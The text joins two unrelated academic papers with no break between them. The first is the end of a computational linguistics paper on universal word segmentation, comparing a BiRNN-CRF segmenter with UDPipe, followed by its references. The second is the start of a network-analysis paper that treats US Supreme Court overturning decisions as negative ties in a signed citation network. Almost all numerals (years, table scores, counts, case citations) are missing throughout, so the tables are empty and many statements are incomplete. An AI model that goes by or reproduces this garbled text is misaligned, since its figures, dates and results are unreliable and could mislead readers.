of green/red are used for better visualisation, with brighter colours for larger differences. green represents that our system is better than udpipe and red is used otherwise. bt bt+crf ft ft+crf chinese . . . . japanese . . . . vietnamese . . . . arabic . . . . hebrew . . . . table : comparison between the binary tags (bt) and the fine-grained tags (ft) as well as the effec- tiveness of the crf interface on the development sets. tags include two basic tags b, i plus the correspond- ing tags b, i for non-segmental multiword tokens. white space is marked as i instead of x. the con- catenated -grams are not applied. in general, the experimental results confirm that the fine-grained tags are more beneficial except for vietnamese. the fine-grained tagset contains more structured posi- tional information that can be exploited by the word segmentation model. additionally, the crf in- terface leads to notable improvements, especially arabic french german hebrew udpipe . . . . our model . . . . table : percentages of the correctly processed multiword tokens on the development sets. for arabic and hebrew. the combination of the fine-grained tags with the crf interface achieves substantial improvements over the basic binary tag model that is analogous to udpipe. for arabic and hebrew, apart from greatly bene- fiting from the fine-grained tagset and the crf inter- face, our model is better at handling non-segmental multiword tokens (table ). the attention-based encoder-decoder as the transducer is much more powerful in processing the non-segmental multi- word tokens that are not covered by the dictionary than the suffix rules for analysing multiword tokens in udpipe. udpipe obtains higher scores on a few datasets. our model overfits the small training data of uyghur segmentation udpipe parser dozat et al. ( ) accuracy uas las uas las udpipe this paper udpipe this paper udpipe this paper udpipe this paper udpipe this paper arabic . . . . . . . . . . chinese . . . . . . . . . . hebrew . . . . . . . . . . japanese . . . . . . . . . . vietnamese . . . . . . . . . . table : extrinsic evaluations with dependency parsing on the test sets. the parsing accuracies are reported in unlabelled attachment score (uas) and labelled attachment score (las). space nltk sample transfer buryat . . . . (russian) kurmanji . . . . (spanish) north sami . . . . (german) upper sorbian . . . . (spanish) table : evaluation on the surprise languages. as it yields . f -score on the development set. for a few parallel test sets, there are punctuation marks not found in the training data that cannot be correctly analysed by our system as it is fully data- driven without any heuristic rules for unknown char- acters. the evaluation results on the surprise languages are presented in table . in addition to the seg- mentation models proposed in this paper, we present the evaluation scores of a space-based tokeniser as well as the nltk model for english. as shown by the previous learning curve experiments in sec- tion . , very high accuracies can be obtained on the space-delimited languages with only small amounts of training data. however, in case of extreme data sparseness (less than training sentences), such as for the four surprise languages in table and kazakh in table , the segmentation results are dras- tically lower even though the surprise languages are all space-delimited. for the surprise languages, we find that applying segmentation models trained on a different language with more training data yields better results than re- lying on the small annotated samples of the target language. considering that the segmentation model is fully character-based, we simply select the model of the language that shares the most characters with the surprise language as its segmentation model. no annotated data of the surprise language are used for model selection. as shown in table , the transfer approach achieves comparable segmentation accu- racies to nltk. for space-delimited languages with insufficient training data, it may be beneficial to em- ploy a well-designed rule-based word segmenter as nltk occasionally outperforms the data-driven ap- proach. as a form of extrinsic evaluation, we test the seg- menter in a dependency parsing setup on the datasets where we obtained substantial improvements over udpipe. we present results for the transition-based parsing model in udpipe . and for the graph- based parser by dozat et al. ( ). the experimen- tal results are shown in table . we can see that word segmentation accuracy has a great impact on parsing accuracy as the segmentation errors propa- gate. having a more accurate word segmentation model is very beneficial for achieving higher pars- ing accuracy. related work the birnn-crf model is proposed by huang et al. ( ) and has been applied to a number of se- quence labelling tasks, such as part-of-speech tag- ging, chunking and named entity recognition. our universal word segmenter is a major exten- sion of the joint word segmentation and pos tagging system described by shao et al. ( ). the origi- nal model is specifically developed for chinese and only applicable to chinese and japanese. apart from being language-independent, the proposed model in this paper employs an extended tagset and a comple- mentary sequence transduction component to fully process non-segmental multiword tokens that are present in a substantial amount of languages, such as arabic and hebrew in particular. it is a gener- alised segmentation and transduction framework. our universal model is compared with the this paper shao che björkelund chinese . . . . japanese . . . . arabic . – . . hebrew . – . . table : comparison between the universal model and the language-specific models. language-specific model of shao et al. ( ) in ta- ble . with pretrained character embeddings, en- semble decoding and joint pos tags prediction as introduced in shao et al. ( ), considerable im- provements over the universal model presented in this paper can be obtained. however, the joint pos tagging system is difficult to generalise as single characters in space-delimited languages are usually not informative for pos tagging. additionally, com- pared to chinese, sentences in space-delimited lan- guages have a much greater number of characters on average. combining the pos tags with segmenta- tion tags drastically enlarges the search space and therefore the model becomes extremely inefficient both for training and tagging. the joint pos tag- ging model is nonetheless applicable to japanese and vietnamese. monroe et al. ( ) present a data-driven word segmentation system for arabic based on a sequence labelling framework. an extended tagset is designed for arabic-specific orthographic rules and applied together with hand-crafted features in a crf frame- work. it obtains . f -score on newswire ara- bic treebank, . on broadcast news treebank, and . on the egyptian arabic dataset. for he- brew, goldberg and elhadad ( ) perform word segmentation jointly with syntactic disambiguation using lattice parsing. each lattice arc corresponds to a word and its corresponding pos tag, and a path through the lattice corresponds to a specific word segmentation and pos tagging of the sentence. the proposed model is evaluated on the hebrew tree- bank (guthmann et al., ). the joint word seg- mentation and parsing f -score ( . ) is reported and compared against the parsing score ( . ) with gold word segmentation. the evaluation scores re- ldc t , ldc t , ldc t ldc t ldc e , , , , , , ldc e , ported in both monroe et al. ( ) and goldberg and elhadad ( ) are not directly comparable to the evaluation scores on arabic and hebrew in this paper, as they are obtained on different datasets. for universal word segmentation, apart from ud- pipe described in section . , there are several systems that are developed for specific language groups. che et al. ( ) build a similar bi-lstm word segmentation model targeting languages with- out space delimiters like chinese and japanese. the proposed model incorporates rich statistics-based features gathered from large-scale unlabelled data, such as character unigram embeddings, character bigram embeddings and the point-wise mutual in- formation of adjacent characters. björkelund et al. ( ) use a crf-based tagger for multiword token rich languages like arabic and hebrew. a predicted levenshtein edit script is employed to transform the multiword tokens into their components. the evalu- ation scores on a selected set of languages reported in che et al. ( ) and björkelund et al. ( ) are included in table as well. more et al. ( ) adapt existing morphologi- cal analysers for arabic, hebrew and turkish and present ambiguous word segmentation possibilities for these languages in a lattice format (conll- ul) that is compatible with ud. the conll-ul datasets can be applied as external resources for pro- cessing non-segmental multiword tokens. conclusion we propose a sequence tagging model and apply it to universal word segmentation. birnn-crf is adopted as the fundamental segmentation frame- work that is complemented by an attention-based sequence-to-sequence transducer for non-segmental multiword tokens. we propose six typological fac- tors to characterise the difficulty of word segmen- tation cross different languages. the experimental results show that segmentation accuracy is primarily correlated with segmentation frequency as well as the set of non-segmental multiword tokens. using whitespace as delimiters is crucial to word segmen- tation, even if the correlation between orthographic tokens and words is not perfect. for space-delimited conll-ul is not evaluated in our experiments as it is very recent work. languages, very high accuracy can be obtained even with relatively small training sets, while more train- ing data is required for high segmentation accuracy for languages without spaces. based on the analy- sis, we apply a minimal number of language-specific settings to substantially improve the segmentation accuracy for languages that are fundamentally more difficult to process. the segmenter is extensively evaluated on the ud datasets in various languages and compared with udpipe. apart from obtaining nearly perfect segmentation on most of the space-delimited lan- guages, our system achieves high accuracies on lan- guages without space delimiters such as chinese and japanese as well as semitic languages with abundant multiword tokens like arabic and hebrew. acknowledgments we acknowledge the computational resources pro- vided by csc in helsinki and sigma in oslo through neic-nlpl (www.nlpl.eu). this work is supported by the chinese scholarship council (csc) (no. ). we would like to thank the tacl editors and reviewers for their valuable feedback. references martı́n abadi, paul barham, jianmin chen, zhifeng chen, andy davis, jeffrey dean, matthieu devin, sanjay ghemawat, geoffrey irving, michael isard, et al. . tensorflow: a system for large-scale machine learning. in proceedings of the th usenix symposium on operating systems design and imple- mentation (osdi), pages – . hervé abdi and lynne j williams. . principal component analysis. wiley interdisciplinary reviews: computational statistics, ( ): – . dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in international con- ference on learning representations. anders björkelund, agnieszka falenska, xiang yu, and jonas kuhn. . ims at the conll ud shared task: crfs and perceptrons meet neural net- works. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . wanxiang che, jiang guo, yuxuan wang, bo zheng, huaipeng zhao, yang liu, dechuan teng, and ting liu. . the hit-scir system for end-to-end pars- ing of universal dependencies. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . xinchi chen, xipeng qiu, chenxi zhu, pengfei liu, and xuanjing huang. . long short-term mem- ory neural networks for chinese word segmentation. in conference on empirical methods in natural lan- guage processing, pages – . kyunghyun cho, bart van merriënboer, dzmitry bah- danau, and yoshua bengio. . on the properties of neural machine translation: encoder-decoder ap- proaches. arxiv preprint arxiv: . . miryam de lhoneux, yan shao, ali basirat, eliyahu kiperwasser, sara stymne, yoav goldberg, and joakim nivre. . from raw text to universal de- pendencies – look, no tags! in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies., pages – . timothy dozat, peng qi, and christopher d. man- ning. . stanford’s graph-based neural depen- dency parser at the conll shared task. in pro- ceedings of the conll shared task: multilin- gual parsing from raw text to universal dependen- cies, pages – , vancouver, canada, august. asso- ciation for computational linguistics. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, (jul): – . xavier glorot and yoshua bengio. . understanding the difficulty of training deep feedforward neural net- works. in international conference on artificial intel- ligence and statistics, pages – . yoav goldberg and michael elhadad. . word seg- mentation, unknown-word resolution, and morpholog- ical agreement in a hebrew parsing system. computa- tional linguistics, ( ): – , march. noemie guthmann, yuval krymolowski, adi milea, and yoad winter. . automatic annotation of mor- phosyntactic dependencies in a modern hebrew. in proceedings of the st workshop on treebanks and linguistic theories, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . zhiheng huang, wei xu, and kai yu. . bidi- rectional lstm-crf models for sequence tagging. arxiv preprint arxiv: . . peter j huber. . robust estimation of a location pa- rameter. the annals of mathematical statistics, pages – . alon itai and shuly wintner. . language resources for hebrew. language resources and evaluation, ( ): – . john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilis- tic models for segmenting and labeling sequence data. in proceedings of the eighteenth international con- ference on machine learning, icml ’ , pages – . haizhou li, a kumaran, vladimir pervouchine, and min zhang. . report of news machine translit- eration shared task. in proceedings of the named entities workshop: shared task on transliteration, pages – . edward loper and steven bird. . nltk: the nat- ural language toolkit. in proceedings of the acl- workshop on effective tools and methodologies for teaching natural language processing and computa- tional linguistics-volume , pages – . association for computational linguistics. will monroe, spence green, and christopher d man- ning. . word segmentation of informal arabic with domain adaptation. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), volume , pages – . amir more, özlem çetinoğlu, çağrı çöltekin, nizar habash, benoı̂t sagot, djamé seddah, dima taji, and reut tsarfaty. . conll-ul: universal morpho- logical lattices for universal dependency parsing. in proceedings of the eleventh international conference on language resources and evaluation. joakim nivre, marie-catherine de marneffe, filip ginter, yoav goldberg, jan hajic, christopher d. manning, ryan mcdonald, slav petrov, sampo pyysalo, na- talia silveira, reut tsarfaty, and daniel zeman. . universal dependencies v : a multilingual treebank collection. in proceedings of the th international conference on language resources and evaluation, pages – . david palmer and john burger. . chinese word seg- mentation and information retrieval. in aaai spring symposium on cross-language text and speech re- trieval, pages – . teemu ruokolainen, oskar kohonen, sami virpioja, and mikko kurimo. . supervised morphological seg- mentation in a low-resource learning setting using con- ditional random fields. in proceedings of the sev- enteenth conference on computational natural lan- guage learning, pages – , sofia, bulgaria. asso- ciation for computational linguistics. ivan a sag, timothy baldwin, francis bond, ann copes- take, and dan flickinger. . multiword expres- sions: a pain in the neck for nlp. in international conference on intelligent text processing and com- putational linguistics, pages – . springer. yan shao, christian hardmeier, jörg tiedemann, and joakim nivre. . character-based joint segmenta- tion and pos tagging for chinese using bidirectional rnn-crf. in proceedings the th international joint conference on natural language processing, pages – . nitish srivastava, geoffrey e hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning re- search, ( ): – . milan straka and jana straková. . tokenizing, pos tagging, lemmatizing and parsing ud . with ud- pipe. in proceedings of the conll shared task: multilingual parsing from raw text to universal de- pendencies, pages – . nianwen xue. . chinese word segmentation as character tagging. computational linguistics and chinese language processing, pages – . daniel zeman, martin popel, milan straka, jan ha- jic, joakim nivre, filip ginter, juhani luotolahti, sampo pyysalo, slav petrov, martin potthast, fran- cis tyers, elena badmaeva, memduh gokirmak, anna nedoluzhko, silvie cinkova, jan hajic jr., jaroslava hlavacova, václava kettnerová, zdenka uresova, jenna kanerva, stina ojala, anna missilä, christopher d. manning, sebastian schuster, siva reddy, dima taji, nizar habash, herman leung, marie-catherine de marneffe, manuela sanguinetti, maria simi, hiroshi kanayama, valeria depaiva, kira droganova, héctor martı́nez alonso, çağr çöltekin, umut sulubacak, hans uszkoreit, vivien macketanz, aljoscha burchardt, kim harris, katrin marheinecke, georg rehm, tolga kayadelen, mohammed attia, ali elkahky, zhuoran yu, emily pitler, saran lertpradit, michael mandl, jesse kirchner, hector fernandez al- calde, jana strnadová, esha banerjee, ruli manurung, antonio stella, atsuko shimada, sookyoung kwak, gustavo mendonca, tatiana lando, rattima nitisaroj, and josie li. . conll shared task: multi- lingual parsing from raw text to universal dependen- cies. in proceedings of the conll shared task: multilingual parsing from raw text to universal de- pendencies, pages – . hai zhao, chang-ning huang, mu li, and bao-liang lu. . effective tag set selection in chinese word segmentation via conditional random field modeling. in proceedings of the th pacific asia conference on language, information and computation, pages – . youguang zhou. . the family of chinese character- type scripts. sino-platonic papers, . connections © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). issue | vol. article | doi: . /connections- - signed networks for the us supreme court overturning its prior decisions the supreme court is placed at the top of the us judicial system. this court can hear all civil cases between states and cases between a state and all federal institutions. also, it can review all decisions made by lower courts. as such, it is one of the three fundamental branches of the us government. its de- cisions can have far reaching effects on all areas of life in the usa. there is a large legal literature on the workings of the supreme court. in this context, fowler and jeon ( ) created a network file with all supreme court decisions for the pe- riod – and their citations to earlier decisions made by this court. the number of decisions in this network is , . producing these data was an in- valuable service for scholars studying this court and for network analysts. it facilitated the study of the us supreme court in terms of network analytic ideas. the network ties are citations from later decisions to earlier decisions taken from the majority opinions . there are multiple ways of studying this citation network. fowler and jeon used it to study the evolution of stare decesis, latin for “to stand by things decided.” they showed a steady evolution of this fundamental legal concept through the nineteenth and the early twenti- eth centuries. they documented a departure from this pattern by the warren court ( – ). by using the concept of authorities (kleinberg, ), they con- structed measures of the importance of decisions and tracked changes in their importance over time. even patrick doreian , and andrej mrvar department of sociology, university of pittsburgh, pittsburgh, usa. faculty of social sciences, university of ljubljana, ljubljana, slovenia. e-mails: pitpat@pitt.edu; andrej. mrvar@fdv.uni-lj.si. this paper was edited by eric quintane. received for publication april , . abstract this paper introduces the idea of studying the decision citation network of the us supreme court in a new fashion by focusing on this court’s overturning of some of its prior decisions. two depar- tures from current practices were developed. one was to consider the phenomenon of overturning in a broader network context. the second was to treat the citations between overturning decisions and the overturned decisions as negative ties. this led to the creation of multiple signed citation networks. these networks were studied to get a better understanding of the operation of this court. the results show that, frequently, when decisions are overturned, this is not done in a logically consistent fashion. a research agenda is proposed regarding a reexamination of stare decesis, thought to be a bedrock of the us legal system, and calling it into question as a genuine operating legal principle. keywords supreme court, overturning decisions, signed networks, citation network. very frequently, multiple opinions are written for each decision. one is the majority opinion which is written by one justice that other justices join. there can be concurring opinions which agree with the decision but use different ar- guments or rationales for supporting the decision that was made. there can be dissenting opinions written by justices who reject the decision. fowler and jeon ( ) used only the majority opinions in constructing the citation network as they are the dominant opinions for the decisions. as a result, the decision and the majority opinion are treated as being the same. signed networks for the supreme court citation network though they were attentive to some decisions over- turning earlier decisions, fowler and jeon treated the ties between overturning decisions and the decisions they overturned as positive citation ties. a different approach to studying this network was presented in batagelj et al. ( , chapter ). rather than use counts of citations to (or from) de- cisions, they opted for examining the extent to which earlier decisions were co-cited. the rationale for this approach was the intuition that earlier decisions being heavily co-cited together must have important fea- tures in common. using the islands technique (bat- agelj et al., , chapter ), they identified sets of decisions that were linked internally by much higher rates of being co-cited than for other decisions within the network. one concerned only native americans. many of the supreme court’s decisions led to heavy constraints on these peoples, especially restrictions of their legal autonomy. the “important feature” for the decisions in this island was the consideration of native americans. another island identified diverse groups of people and ideas targeted in the us court system following three acts passed by congress in wwi. the con- stitutional principles involved the first and fourteenth amendments as the important features holding this set of decisions together. the targeted groups were in sequence: socialists and communists (in the first red scare in the s); labor unions; black organi- zations, especially the naacp; jehovah’s witnesses; communists and socialists again (in the second red scare from the late s through the s); je- hovah’s witnesses again; women (regarding limiting their access to birth control and, later, abortion); ob- scenity; the free press; and restrictions of the free- dom of speech. both of these studies provided useful insights re- garding the decisions of the supreme court and the impacts these decisions had on the usa, its institu- tions and its population. the key new idea introduced here is to treat the supreme court citation network as being signed when overturning of prior decisions occurs. the rest of the paper is organized as follows. sec- tion “treating the supreme court citation network as signed” provides the rationale of defining negative ties in the supreme court citation network and treating it being signed. section “consistencies and inconsistencies in triples of decisions” introduces the idea of there being inconsistencies in signed triples of decisions when overturning is involved. section “the supreme court overturning network data” provides the definition of multiple signed networks that result along with the rationale for studying them in detail. we focus on the decisions linked by negative ties in section “networks of decisions linked only by neg- ative citation ties.” the mobilization of inconsistency ideas follows in section “mobilizing ideas regarding inconsistencies when decisions are overturned” and forms the core of the paper . section “empirical ex- amples of the inconsistent triple types” provides fur- ther examples of inconsistent triples. our conclusions and a proposed research agenda are presented in section “conclusions, a research agenda and a speculation about stare decesis.” treating the supreme court citation network as signed here, we introduce a different approach to these data by focusing on this citation network as one that is signed. as noted by fowler and jeon ( ), a large majority of supreme court decisions cite earlier deci- sions . within their research framework, all citations were positive ties. however, there is no sensible basis for treating any overturning “citation” tie as a positive citation to the overturned decision. when an earlier decision is overturned, the overturning decision re- pudiates all or part of the overturned decision. the ties between them must be considered as negative. this implies the construction of one or more signed citation networks for studying supreme court deci- sions. by a wide margin, most ( %) earlier decisions were overturned completely. the designation of a de- cision as being overturned “in part” was made by the government printing office ( ). decisions, most often, have multiple components and rationales for the decisions that were made. if only some of them are negated by a subsequent decision, this was listed as a decision that was overturned in part. to our knowledge, such an approach has not been adopted hitherto when examining the supreme court citation network. this creates an opportunity two were the selective service act and espionage act that were passed in . the sedition act was passed in to extend the espionage act to broaden the number of offenses meriting punishments for interfering with the operation of the us government. most of the analyses performed for our results used pajek (batagelj and mrvar, ). there are decisions that cite no earlier decisions and are not cited by later decisions. as such, they are isolates in the citation network and were not considered further. connections for considering some additional questions about the operation of this court. the resulting signed networks are described in more detail in section “the supreme court overturning network data.” these questions include: (a) what is the nature and structure of this signed network? (b) how much overturning of prior decisions exists? (c) why do prior decisions get overturned? and (d) what can be gained by looking at networks of supreme court decisions linked by negative ties? as noted above, fowler and jeon ( ) consid- ered stare decesis to document its existence and importance. we look at this idea in a different way by viewing it with greater skepticism even though it is thought to be one of the bedrocks of the us judicial system. this is done using the negative ties due to some decisions overturning prior decisions which are instances of stare decesis being explicitly rejected. our hope is that this line of analysis will add to the work of spaeth and segal ( ) who, using a clever research design, provided convincing evidence that justices are far more like to vote their preferences than they are to follow stare decesis. most discussions of the supreme court overturn- ing prior decisions focus primarily on single pairs of de- cisions. in considering such (overturning, overturned) pairs of decisions, the main features considered in these analyses include the substantive issues in- volved, the constitutional principles used to decide cases, and the written opinions of justices regarding prior relevant decisions. of course, these issues must be considered always in such analyses. but, while this is very useful for studying pairs of decisions, such a strategy has limitations by being a dyadic approach. as we show below, such (overturning, overturned) pairs of decisions are embedded in larger network structures, especially triples of decisions, in ways that show logical inconsistencies. it seems more fruitful to think in terms of networks of decisions involving cases when prior decisions are overturned. consistencies and inconsistencies in triples of decisions here, we focus primarily on the presence of incon- sistencies in triples of decisions when there are neg- ative ties between some pairs of decisions. this is illustrated in figure with three triples of hypothetical supreme court decisions where consistency appears to be lacking. in the left-side triple, decision cites decisions and positively even though decision overturns decision . in the middle triple, decision cites decision positively while decision cites deci- sion positively. yet decision overturns decision . in the rightmost triple, decision overturns decision and cites positively decision . but decision also cites decision positively. all these triples are incon- sistent. we provide real empirical examples of each of these inconsistent triple types in section “mobiliz- ing ideas regarding inconsistencies when decisions are overturned.” ideally, none of these inconsistent triples would exist in a signed supreme court citation network if the arguments and ideas expressed in these decisions were thought through in a thoroughly systematic fashion. but, as we show below, such inconsistencies do exist, raising two obvious further questions. first, how many such triples are there? second, does this matter? the answers are that many do exist and, yes, they do matter. however, there is a complication that arises here. consider the rightmost triple in figure . if decision overturns a part of decision that is irrelevant for decision , that decision cites decision and that figure : three inconsistent triples of hypothetical decisions each involving one overturning link. signed networks for the supreme court citation network decision does not overturn decision , then there is no inconsistency. this implies a need to distin- guish between completely overturned decisions and decisions that are overturned in part. we tackle this in two ways. one is to ignore the distinction and treat- ing all overturning pairs. this has a clear problem in that the number of instances of inconsistencies will be overstated. the second is to confine attention solely to those decisions that are overturned com- pletely. this also has a limitation in that the number of instances of inconsistencies will be understated. continuing the example, if decision overturns a part of decision that is relevant for decision , then there is an inconsistency. an inherent task for a com- plete analysis is the necessity to look at all (overturn- ing, overturned) pairs of decision to determine what exactly was overturned when a decision is overturned in part. this will be a daunting task but is not needed here given the results shown below. the supreme court overturning network data the primary data source for the signed network we consider herein is the government printing office ( ) document: supreme court decisions over- ruled by subsequent decision. these data were sup- plemented by information obtained from multiple other sources including: epstein et al. ( ), root ( ), vile ( ), powe ( ), gerhardt ( ), hall ( ), spriggs and hansford ( ), brenner and spaeth ( ) and eskridge ( ) . this entailed identify- ing the overturned decisions in the larger network of fowler and jeon and marking the overturning links as negative citation ties. multiple signed networks were constructed. for the period we consider ( – ) , there were decisions involved in the resulting networks with later decisions overturning prior decisions. there were instances of such (overturning, overturned) pairs of decisions. below, we show that some decisions overturned more than one decision. such a phenom- enon would be missed in a strict dyadic approach to overturning decisions. this has relevance as overturn- ing one decision can imply that other related earlier decisions may also suffer the same fate. examples of this happening are provided in section “networks of decisions linked only by negative citation ties”. some decisions were overturned multiple times. it would seem that if a prior decision is overturned completely, this ought to be sufficient to invalidate the overturned decision as precedent. seemingly, this is not the case. when a decision is overturned, there are rationales provided for doing so. however, there can be different rationales for overturning an earlier decision. in the view of later courts overturning prior decisions, it appears that they think they have a more compelling rationale for overturning an earlier decision. such instances strongly reinforce our view that con- sidering networks of decisions instead of separate dyads is useful. multiple signed networks can be constructed. one is the network of decisions linked by only the negative ties. this is illustrated in figure and dis- cussed further in section “networks of decisions linked only by negative citation ties.” there is also the adaptation of the fowler and jeon ( ) network where the overturning links defined as negative rather than positive were changed. for our major analyses, we labeled this as a “starting” network. we used this network to create another signed network by embed- ded it into the network of all relevant decisions and the positive ties linking them in the fowler and jeon network. the relevance for this inclusion was that the additional decisions had to meet two critical criteria. one was to include all earlier decisions that were cited (positively) by the decisions in the starting network. the second was to include all of the later decisions citing all of the decisions in the so-called starting net- work. the resulting network had , decisions. it had , positive ties and negative ties. we first show the bigger picture regarding over- turning of prior decisions in figure . this is the first signed network as all the network ties in this figure are negative. it is ordered by time with the most recent courts being at the top of the figure and the earlier courts at the bottom . it shows two features regarding the supreme court. one is the levels of additional information, along with confirmations for deter- mining pairs of overturning and overturned decisions came from a variety of on-line sources. particularly useful ones were: https://supreme.justia.com/cases/federal/us; https:// law.resource.org/pub/us/case/reporter/us; http://caselaw. findlaw.com/us-supreme-court, https://www.law.cornell. edu/ (legal information institute); https://www.lexisnexis. com/en-us (lexis nexis); and https://en.wikipedia.org/wiki/. to consider a larger number of instances of this court overturning prior decisions, we expanded the time range to , the end of the rehnquist court. a future project will include the roberts court that followed the rehnquist court. connections overturning between supreme courts, defined by their chief justices, where the arrows show the mag- nitudes of each court overturning decisions of earlier courts. the widths of these overturning links are far larger in recent years. the other feature is reflected in the sizes of the vertices showing the levels at which specific courts, as defined by their chief justices, overturn themselves. figure raises the issue of why the rates of over- turning prior decisions have increased over time. in large part, we think this may be due simply to the increasing number of prior decisions that could be considered as relevant and wrongly decided by earlier courts. however, we suspect that there may be an additional source for these increased levels of overturning prior decisions. when writing decisions, justices are free to cite any prior decisions made by earlier courts. more consequentially, perhaps, they are free to not cite earlier decisions which, while rel- evant, would not support the decision being made . there are few constraints regarding citation behavior beyond creating the need of crafting arguments and generating support for decisions being made. also, specific courts may have increased rates for overturning prior decisions if their broad ideological stances differed. the warren court is generally thought to have been “liberal.” indeed, fowler and jeon ( ) note that the warren court often overruled precedent. irons ( ) makes a compelling case that, over its long-term history, the supreme court was filled by insiders making decisions with negative impacts on outsiders, primarily minorities, women and the poor. put differently, irons emphasized the figure : levels of overturning decisions within and between courts defined by chief justices. one compelling example of this phenomenon came with the dred scott decision (scott v. sandford) written by chief justice taney in . according to irons ( , ), “he misread history, twisted legal precedent, and bent the constitution out of shape, all to achieve his predetermined goal of promoting the extension of slavery into the territo- ries” (the territories were not part of states at that time). as a part of doing this, he ignored at least prior decisions made by his own court. these omissions were pointed out by the two dissenting justices, mcclean and curtis, in their strong opinions. pun intended, there are precedents for ignoring precedent. signed networks for the supreme court citation network warren court’s expansive view of rights for all amer- icans. in contrast, the rehnquist, burger, and vinson courts have been regarded as “conservative” and more supportive of traditional values. yet, figure makes it clear that these conservative courts also overturned prior decisions at about the same rate as the warren court. with different judicial philosophies, there are in- centives for targeting earlier decisions that differ in this regard. it will be a monumental task to pursue this as supreme court decisions will have to be read closely, along with concurrences and dissents. that is reserved for another project. networks of decisions linked only by negative citation ties here, we consider the network having only the nega- tive overturning links between decisions regardless of the courts making them. it merits attention by having a set of weak components. their distribution in terms of size is: one having decisions; six with deci- sions; ten having decisions; with decisions; with decisions; and dyadic pairs. while all these components can be considered, we focused on some of the largest weak components. the primary concern for doing this was to understand the sub- stantive issues involved in these cases, the constitu- tional issues used to decide a case, and the courts involved in these decisions. this is fully consistent with a general research strategy that considers the contexts within which networks are established. the largest such weak component having ten decisions is shown in figure . the two overturning decisions both came from the warren court ( – ). the overturned de- cisions were made by the fuller ( – ), white ( – ), taft ( – ), hughes ( – ), stone ( – ), and warren courts. the primary substantive concern was the immunity provision (against self-incrimination) in conjunction with the ways the police obtained evidence. another substan- tive issue was the relative roles of the federal and state courts regarding the nature of evidence, a long-term thorny and contentious legal issue. the constitutional issues involved were the fourth amendment (regard- ing search and seizure) , the fifth amendment (re- garding self-incrimination and due process) , and the fourteenth amendment (protecting rights against state infringements and prohibiting states from inter- fering with privileges and immunities) . the warren court, after , took seriously the protections afforded to people, especially regard- ing due process (irons, ). this contrasted with the fifth amendment allows defendants not to provide testimony that would be incriminating. figure : the ten-vertex weak component of decisions linked by negative ties. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. the fourth amendment states: “the right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.” the fifth amendment, in full, states: “no person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a grand jury, except in cases arising in the land or naval forces, or in the militia, when in actual service in time of war or public danger; nor shall any person be subject for the same of- fense to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor be deprived of life, liberty, or property, without due process of law; nor shall private property be taken for public use, without just compensation.” connections earlier courts that were willing to give the police free rein in gathering evidence even though their practices for doing so frequently violated these amendments . this expansive view regarding rights was especially the case after justice frankfurter, a conservative jus- tice, left the warren court. the overturned decision, us , was authored by frankfurter. another overturned decision, us , was a per curiam (unsigned) decision – but there were dissenting justic- es. justice frankfurter was not among the dissenters and, by inference, it is fair to claim he supported this decision. the overturning decision, us , was authored by his replacement of the court, justice goldberg. it is reasonable to conjecture that, when courts overturn themselves, the most likely reason is the change of its personnel. this is a hypothesis worthy of future exploration. the other decisions overturned by us all concerned earlier decisions accepting the use of police procedures violating the us constitution. the decision in us , a landmark case accord- ing to multiple sources, was emphatic about rights against self-incrimination guaranteed under the fifth amendment. earlier courts were willing to declare that if defendants “took the fifth” it was, in effect, an admission of guilt – with convictions following frequently. figure contains a six-vertex weak component with three landmark decisions. the earliest of them is us , plessy v. ferguson. decided in by the fuller court, it established the “separate but equal” doctrine regarding race as being constitutional. while the separation (segregation) of races was real, the equal part was far from the reality for the experi- ence of african american citizens being denied ac- cess to public spaces. this decision was overturned by two decisions made by the warren court. one was us , brown v. the board of education of tope- ka, kansas, which ruled that state laws permitting the establishment of separate schools for black and white students violated the equal protection clause of the fourteenth amendment. two years later, us , gayle v. browder, did the same regarding racial seg- regation in buses in montgomery, alabama. other re- lated decisions were overturned also, something that would be missed under the dyadic approach to con- sidering the overturning of supreme court decisions. this figure shows emphatically the importance of ex- amining decisions in a broader context than simple pairwise examination of decisions while ignoring the broader context in which these decisions were made. the substantive issues for these decisions were: (a) civil rights and segregation under the “separate but equal” doctrine; and (b) targeting minorities, especially blacks (but also chinese people at the time of the earliest overturned decision). the constitutional issues were twofold. one was, as noted above, the fourteenth amendment (regarding equal protec- tion). the second was the ability of federal courts figure : a six-vertex weak component. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. the fourteenth amendment (section ) states: “all per- sons born or naturalized in the united states, and subject to the jurisdiction thereof, are citizens of the united states and of the state wherein they reside. no state shall make or enforce any law which shall abridge the privileges or immunities of citizens of the united states; nor shall any state deprive any person of life, liberty, or property, without due process of law; nor deny to any person within its juris- diction the equal protection of the laws.” this is a part of what fowler and jeon ( ) noted regarding the warren court – but with a very different interpretation. signed networks for the supreme court citation network to intervene at the state level, something frequently opposed under the rubric of “state’s rights.” this is another example of the warren court overturning precedents. both of these overturning decisions were hailed as a part of major victory for the civil rights movement. of course, they were. but these decisions also set off a fire storm of reactions both in the legal arena and, perhaps more consequentially, with illegal (and fre- quently very violent) actions including many lynchings of black people, when white people, especially – but not exclusively – in the south, took exception to these rulings and targeted african americans. this example makes clear also the necessity for considering the social and legislative contexts within which supreme courts make their decisions, a point made in batagelj et al. ( , chapter ). figure shows a five-vertex weak component with a two-step path of overturning decisions . the left-most decision was made by the warren court. the remaining decisions were made by the vinson court. the substantive issue was the admissibility of evidence collected without a warrant. there were two critical constitutional issues. one is the fourth amendment (regarding search and seizure) and the fourteenth amendment (due process). 